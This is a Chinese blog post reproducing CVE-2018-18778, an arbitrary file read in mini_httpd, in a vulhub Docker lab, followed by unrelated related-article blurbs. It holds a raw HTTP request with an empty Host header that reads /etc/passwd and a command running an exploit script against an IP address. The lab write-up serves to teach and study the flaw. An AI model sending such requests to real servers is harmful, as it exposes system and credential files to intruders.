.exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)

最新推荐文章于 2024-07-25 11:30:40 发布

weixin_39741101

最新推荐文章于 2024-07-25 11:30:40 发布

阅读量271

点赞数

文章标签： .exp文件 host文件

一、环境搭建：

进入镜像目录：

cd vulhub/mini_httpd/CVE-2018-18778

启动环境：

docker-compose up -d

访问8088端口

二、漏洞描述：

Mini_httpd是一个微型的Http服务器，在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%)，因此广泛被各类IOT(路由器，交换器，摄像头等)作为嵌入式服务器。而包括华为，zyxel，海康威视，树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。

在mini_httpd开启虚拟主机模式的情况下，用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。

(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

当HOST=example.com、FILE=index.html的时候，上述语句结果为example.com/index.html，文件正常读取。

当HOST为空、FILE=etc/passwd的时候，上述语句结果为/etc/passwd。

后者被作为绝对路径，于是读取到了/etc/passwd，造成任意文件读取漏洞。

三、漏洞复现：

清空HOST头，路径为读取的文件：

GET /etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: close

成功读取到/etc/passwd：

四、自动化利用EXP:

python3 mini_httpd_exp.py http://192.168.136.131:8080

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_39741101

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP（文件上传漏洞、冰蝎蚁剑、反序列化phar）

杨秀璋的专栏

05-30

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了WHUCTF部分题目，包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路，详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF，还是学到了很多东西，后面几天忙于其他事情，就没再参加。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢网安学院，感谢这些大佬和师傅们（尤其出题和解题的老师们）~

文件包含漏洞

forwardss的博客

03-08

1030

文件包含程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接用此文件，而无需再次编写，这种调用文件的过程一般被称为包含。一、原理和定义为什么会产生文件包含漏洞？程序开发人员都希望代码更加灵活，所以通常会将被包含的文件设置为变量，用来进行动态调用，但正是由于这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。以php，webapplication 中...

参与评论您还未登录，请先登录后发表或查看评论

CVE-2018-18778.docx

07-23

CVE-2018-18778 ，mini_httpd任意文件读取漏洞，

mini_httpd + PHP 构建SSL MINI WEB

春风得意，马蹄仍急；少年豪情，一笑难回。

06-18

1971

一、简介目的：构建小型WEB站，具备SSL,解析PHP脚本（适用嵌入式环境）。作者：sundy 2006-3-6 E_MAIL:hysundy@163.com 二、环境资源 redhat 8 mini_httpd_1.19 b修改版 php.4.4.2 三、步骤说明 -----------------------------

shopxo 文件读取（CNVD-2021-15822）

热门推荐

lixuyuan的专栏

07-08

1万+

1、下载：http://www.acme.com/software/mini_httpd/mini_httpd-1.19.tar.gz2、解压：tar zxvf mini_httpd-1.19.tar.gz3、编译，安装：cd mini_httpd-1.19

渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞

墨鱼菜鸡

07-11

3179

1、渗透测试实用浏览器插件 chrome、edge 插件：搜索 cookie，安装 cookie editor，打开插件，可以导出 cookie HackBar ：Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。解决Firefox插件-H...

php文件包含哪些,PHP文件包含小总结

weixin_39714164的博客

03-12

1803

1.前言最近在某个项目上天天挖洞，每天不是什么信息泄露就是xss，没有一个能getshell，愁的不行，感觉头顶都凉飕飕了。不知是早上出门时，没注意踩到狗屎，还是今天运气好，发现一处竟然有文件包含漏洞，百度一波getshell姿势，逐一尝试后，发现可以利用日志getshell。这里本地模拟一下当时情况，复现一下。同时就让我这个小菜鸡总结一下getshell方式，以便之后遇到文件包含漏洞更快的去拿s...

服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

ran的博客

05-13

2764

ISS中间件（Internet Security and Acceleration Server Middleware）是微软公司推出的一种安全中间件，旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者，也是Microsoft Forefront TMG（Threat Management Gateway）的前身。

mini_httpd-1.19.tar.7z

11-20

mini_httpd是常用的嵌入web服务器，可以支持http,https，mini_httpd-1.19.tar.7z源码，非常经典，非常实用，值得拥有

不安全的配置----mini_httpd任意文件读取漏洞（CVE-2018-18778）

qq_43571759的博客

05-01

1056

mini_httpd任意文件读取漏洞（CVE-2018-18778） Mini_httpd是一个微型的Http服务器，在占用系统资源较小的情况下可以保持一定程度的性能（约为Apache的90%），因此广泛被各类IOT（路由器，交换器，摄像头等）作为嵌入式服务器。而包括华为，zyxel，海康威视，树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。在mini_httpd开启虚拟主机模式的...

mini httpd php,MINI_HTTPD笔记

weixin_39600366的博客

03-17

343

如何让mini_httpd支持php那天听清茶说再搞mini_httpd,可是cgi跑不起来,反正我那天也有空,所以自己也下载了一个mini_httpd玩玩.(把过程写下来,让有类似需求的兄弟少走弯路,嘿嘿,还有就是自己比较的健忘~~~)下载代码,解压缩,然后makemake install呵呵,很顺利,很方便(看看版本:/usr/local/sbin/mini_httpd -Vmini_http...

mini_httpd+cgi运行iptables等需要root权限的程序或脚本

weixin_42123347的博客

10-12

709

最近项目需求移植了一个mini_httpd做嵌入式服务器，需要在网页里进行重启还有修改一些iptable规则，因为用root登录板子，运行一些带有iptables 或者重启的脚本都没问题，一到网页调用cgi程序去用system()或者popen调用外部脚本，却不行，找了很久后发现，是权限问题，在网上找了一圈，踩了许多坑后，终于解决这个问题：第一步，在cgi程序里，在想用system或者pope...

MINI_httpd移植，构建小型WEB服务器

jk110333的专栏

05-10

6994

一、简介目的：构建小型WEB站，具备SSL,解析PHP脚本（适用嵌入式环境）。 mini_httpd is a small HTTP server. Its performance is not great, but for low or medium traffic sites it's quite adequate. It implements all the basic featu

mini_httpd + php 构建SSL MINI WEB

积水成渊

11-06

1606

mini_httpd任意文件读取漏洞（CVE-2018-18778）

EC_Carrot的博客

07-12

414

漏洞详细详细请参考：https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/ 漏洞复现发送请求是将Host置空，PATH的值是文件绝对路径：

mini-httpd源码分析-mini-httpd.c

weixin_30765319的博客

09-09

216

main函数分析；一，参数设置：　　读取命令行参数　　　　　　　　　配置文件参数　　　　　　读取参数，设置对应的全局变量。主要参数有：配置文件；资源目录；进程ID文件；日志文件；字符集；主机名及端口号... 二，参数处理：重点分析，主机名及端口号，damon 　　1，主机名及端口号　　　　解析主机名，获取对应IP地址，初始化监听套接字（包括：socket,bind,listen...

apache中的httpd.conf proxy_set_header添加参数

09-10

在 Apache 的配置文件 `httpd.conf`中，如果你想为反向代理请求添加自定义的头信息参数，可以通过使用 `RequestHeader set` 指令实现。下面是一个示例，它演示了如何在反向代理请求中添加自定义头信息参数： ```apache ProxyPass / http://destination.example.com/ <Location /> ProxyPassReverse / RequestHeader set X-Custom-Header "Custom Value" </Location> ``` 在以上示例中，通过 `ProxyPass` 和 `ProxyPassReverse`指令将所有以根路径 "/" 开头的请求反向代理到目标服务器 `http://destination.example.com/`。然后，在 `<Location>` 块内使用 `RequestHeader set`指令来设置自定义的头信息参数。其中，`X-Custom-Header` 是自定义头标签的名称，"Custom Value" 是对应的值。请注意，在你的 `httpd.conf` 添加这些配置之后，重启 Apache 服务器以应用更改并使其生效。希望这个回答对你有所帮助！如果你有其他问题，请随时提问。